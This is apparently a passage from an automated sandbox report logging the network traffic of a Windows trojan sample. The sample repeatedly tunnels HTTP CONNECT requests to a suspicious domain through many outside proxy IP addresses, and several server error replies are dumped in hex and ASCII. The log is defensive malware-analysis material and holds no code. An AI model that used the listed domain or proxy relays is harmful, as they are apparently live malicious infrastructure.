                                                                                Feb 23, 2024 14:28:40.882514954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.882843971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:49.991781950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1512192.168.2.85441324.249.199.441455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.774658918 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1513192.168.2.854441159.65.77.16885855828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.783055067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1514192.168.2.85344645.230.49.29995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.799386978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.882503986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.429508924 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1515192.168.2.85443351.75.125.208333565828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.799782991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1516192.168.2.853378188.132.221.16980805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.808516979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.882518053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.075982094 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1517192.168.2.85442163.250.52.8281185828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.833112955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.092897892 CET207INHTTP/1.1 400 Bad request
                                                                                Content-length: 90
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1518192.168.2.85024392.204.134.38597275828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.863132954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.882571936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1519192.168.2.854417221.151.181.10180005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.868076086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.694721937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.679492950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.491930008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.992166996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:48.491910934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:51.960505009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:58.897831917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:12.899585962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1520192.168.2.854427109.194.22.6180805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.879060984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1521192.168.2.85444545.179.231.21056785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.908072948 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1522192.168.2.85441658.246.58.15090025828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.909121037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.235666037 CET311INHTTP/1.1 400 Bad Request
                                                                                Server: nginx
                                                                                Date: Fri, 23 Feb 2024 13:28:38 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 166
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1523192.168.2.854311178.128.200.87805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.913125038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.991789103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.992583990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:49.991878033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:01.991744041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:14.085391998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:26.085330963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1524192.168.2.854424196.15.237.19718885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.932388067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1525192.168.2.854458184.185.2.1241455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.933731079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1526192.168.2.85023991.247.92.6356785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.941343069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1527192.168.2.8544683.75.236.5831285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.955451965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.134371996 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1528192.168.2.85444327.65.240.15710805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.957911015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1529192.168.2.854467187.19.127.25341535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.965703011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1530192.168.2.850213193.253.220.32805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.002542019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.992003918 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.992599964 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:49.991902113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:01.991743088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:09.337240934 CET536INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:27:41 GMT
                                                                                Server: Apache/2.4.18 (Ubuntu)
                                                                                Content-Length: 639
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of
                                                                                Feb 23, 2024 14:29:09.337260962 CET295INData Raw: 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72
                                                                                Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at heygirlisheeverythingyo


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1531192.168.2.850159103.25.210.1023475828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.096143961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.147439957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.164872885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:50.288680077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:02.301899910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1532192.168.2.854377104.200.135.4641455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.113826990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1533192.168.2.854451112.133.192.23156785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.115609884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1534192.168.2.85447985.172.60.20211815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.173685074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1535192.168.2.85448643.251.132.13380805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.187478065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.493727922 CET340INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.12.2
                                                                                Date: Fri, 23 Feb 2024 13:28:37 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1536192.168.2.85035179.143.187.58594105828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.187580109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.288640022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.289325953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1537192.168.2.85447820.6.9.237200005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.187917948 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.879488945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.858962059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1538192.168.2.853528200.155.168.7080805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.202708006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.382276058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1539192.168.2.85449394.30.152.172805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.204525948 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.407007933 CET310INHTTP/1.1 400 Bad Request
                                                                                Server: nginx
                                                                                Date: Fri, 23 Feb 2024 13:28:38 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 150
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1540192.168.2.850483154.65.39.8805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.229103088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.382463932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.492208958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
